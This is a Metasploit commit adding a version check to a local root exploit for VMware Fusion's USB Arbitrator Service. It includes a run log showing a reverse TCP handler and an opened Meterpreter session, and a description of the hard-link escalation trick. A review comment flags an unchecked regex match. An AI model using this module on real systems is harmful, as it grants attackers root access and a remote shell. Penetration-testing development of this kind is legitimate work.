add version check

h00die
2020-03-24 14:27:31 -04:00
committed by h00die
parent eda3653a51
commit 7bc30ecf39
2 changed files with 17 additions and 4 deletions
@@ -46,6 +46,8 @@ lhost => 1.1.1.1
resource (fusion.rb)> set lport 8888
lport => 8888
resource (fusion.rb)> exploit
[+] Vmware Fusion 11.5.1 is exploitable
[*] The target appears to be vulnerable.
[*] Started reverse TCP handler on 1.1.1.1:8888
[*] Sending stage (53755 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:8888 -> 2.2.2.2:49265) at 2020-03-23 18:07:57 -0400
@@ -23,6 +23,7 @@ class MetasploitModule < Msf::Exploit::Local
user home directory in a specific folder, and creating a hard link to the 'Open VMWare
USB Arbitrator Service' binary, we're able to launch it temporarily to start our payload
with an effective UID of 0.
Successfully tested against 11.5.1, and 11.5.2
),
'License' => MSF_LICENSE,
'Author' =>
@@ -69,11 +70,21 @@ class MetasploitModule < Msf::Exploit::Local
end
def check
if exists? "/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}"
print_good "'#{usb_service}' binary detected"
return CheckCode::Appears
unless exists? "/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}"
print_bad "'#{usb_service}' binary missing"
return CheckCode::Safe
end
CheckCode::Safe
version_raw = cmd_exec "plutil -p '/Applications/VMware Fusion.app/Contents/Info.plist' | grep CFBundleShortVersionString"
/=> "(?<version>\d{0,2}\.\d{0,2}\.\d{0,2})"/ =~ version_raw #supposed 11.x is also vulnerable, but everyone whos tested shows 11.5.1 or 11.5.2
version = Gem::Version.new(version)
if version.between?(Gem::Version.new('11.5.0'), Gem::Version.new('11.5.2'))
vprint_good "Vmware Fusion #{version} is exploitable"
else
print_bad "VMware Fusion #{version} is NOT exploitable"
return CheckCode::Safe
end
CheckCode::Appears
end
def exploit
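Review bot: The result of the regex match on the `version_raw` line in `check` is never tested, so when the `plutil` output has no `CFBundleShortVersionString` value in that shape the named capture `version` is nil and `Gem::Version.new(version)` is called on it anyway. Depending on the RubyGems version that probably either raises or yields a zero version, and `\d{0,2}` also admits empty components such as `..`, which `Gem::Version` rejects as malformed. I would tighten the pattern to `\d{1,2}` per component and add `return CheckCode::Unknown unless version` before the conversion, so an unreadable plist is reported as undetermined instead of raising or being reported Safe. Separately, the success line uses `vprint_good` while the documentation hunk shows `[+] Vmware Fusion 11.5.1 is exploitable` in a normal run. The lower bound `11.5.0` is also wider than the 11.5.1 and 11.5.2 the description names as tested, so a one-line comment stating why the range starts there would help.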